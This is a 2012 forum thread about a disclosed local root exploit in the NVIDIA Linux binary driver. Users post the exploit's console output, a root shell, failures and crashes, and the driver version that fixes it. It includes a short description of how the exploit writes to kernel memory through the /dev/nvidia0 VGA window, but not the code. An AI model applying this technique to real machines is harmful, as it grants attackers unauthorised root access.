nV News Forums

 
 


leigh123linux 08-02-12 03:29 AM

nvidia linux binary driver priv escalation exploit
 
Please fix this security issue!!


http://permalink.gmane.org/gmane.com...sclosure/86747


Quote:

First up I didn't write this but I have executed it and it did work here,

I was given this anonymously, it has been sent to nvidia over a month
ago with no reply or advisory and the original author wishes to remain
anonymous but would like to have the exploit published at this time,
so I said I'd post it for them.

It basically abuses the fact that the /dev/nvidia0 device accepts
changes to the VGA window and moves the window around until it can
read/write to somewhere useful in physical RAM, then it just does a
priv escalation by writing directly to kernel memory.

Dave.
http://permalink.gmane.org/gmane.com...sclosure/86747


http://pastebin.com/Gg0LBBUA

Code:

    [leigh@main-pc Desktop]$ ./nvidia
    [*] IDT offset at 0xffffffff81dea000
    [*] Abusing nVidia...
    [*] CVE-2012-YYYY
    [*] 64-bits Kernel found at ofs 0
    [*] Using IDT entry: 220 (0xffffffff81deadc0)
    [*] Enhancing gate entry...
    [*] Triggering payload...
    [*] Hiding evidence...
    [*] Have root, will travel..
    sh-4.2# whoami
    root
    sh-4.2#


sjlopezb 08-03-12 06:16 PM

Re: nvidia linux binary driver priv escalation exploit
 
NO recommend user root.

Recommended user normal.

leigh123linux 08-03-12 09:41 PM

Re: nvidia linux binary driver priv escalation exploit
 
Quote:

Originally Posted by sjlopezb (Post 2570754)
NO recommend user root.

Recommended user normal.

Your reply is senseless.

towo| 08-04-12 12:36 PM

Re: nvidia linux binary driver priv escalation exploit
 
Does not work for me
Code:

    ~/scripts
    towo:Defiant> uname -a
    Linux Defiant 3.5-0.towo-siduction-amd64 #1 SMP PREEMPT Mon Jul 30 16:30:29 UTC 2012 x86_64 GNU/Linux

    ~/scripts
    towo:Defiant> whoami
    towo

    ~/scripts
    towo:Defiant> ./nvidia
    [*] IDT offset at 0xffffffff8172a000
    [*] Abusing nVidia...
    [*] CVE-2012-YYYY
    [*] 64-bits Kernel found at ofs 0
    [*] Using IDT entry: 220 (0xffffffff8172adc0)
    [*] Enhancing gate entry...
    [*] Triggering payload...
    Getötet

    ~/scripts
    towo:Defiant>

driver is 304.30

artem 08-04-12 04:49 PM

Re: nvidia linux binary driver priv escalation exploit
 
304.32 drivers fix this security issue.

leigh123linux 08-04-12 06:00 PM

Re: nvidia linux binary driver priv escalation exploit
 
Confirmed


Code:

    [leigh@main-pc Desktop]$ ./nvidia
    [*] IDT offset at 0xffffffff81dea000
    [*] Abusing nVidia...
    [leigh@main-pc Desktop]$ ./nvidia
    [*] IDT offset at 0xffffffff81dea000
    [*] Abusing nVidia...
    [leigh@main-pc Desktop]$ ./nvidia
    [*] IDT offset at 0xffffffff81dea000
    [*] Abusing nVidia...
    [leigh@main-pc Desktop]$


eskuai 08-05-12 04:52 PM

failed ? nvidia linux binary driver priv escalation exploit
 
Linux darkstar 3.4.6-2.fc17.i686.PAE #1 SMP Thu Jul 19 21:49:03 UTC 2012 i686 i686 i386 GNU/Linux
[*] IDT offset at 0xc0b70000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc0b706e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned 1 (1)
[*] Failed to get root.

nvidia 302.17

kokoko3k 08-06-12 06:35 AM

Re: nvidia linux binary driver priv escalation exploit
 
Fails here too with nvidia 302.17, pae system

phil@elrepo 08-06-12 06:59 AM

Re: nvidia linux binary driver priv escalation exploit
 
I've been unable to exploit RHEL5 or RHEL6 64-bit systems running 256.53, 295.59 or 302.17. Some users report hard lockups (crashes) whereas I see nothing.

Code:

    [phil@Quad nvidia]$ ./nvidia-exploit
    [*] IDT offset at 0xffffffff804b8000
    [*] Abusing nVidia...
    [phil@Quad nvidia]$ whoami
    phil


kokoko3k 08-08-12 11:49 AM

Re: nvidia linux binary driver priv escalation exploit
 
Well, I've had an instant reboot after I tried to change tty :)


All times are GMT -5.
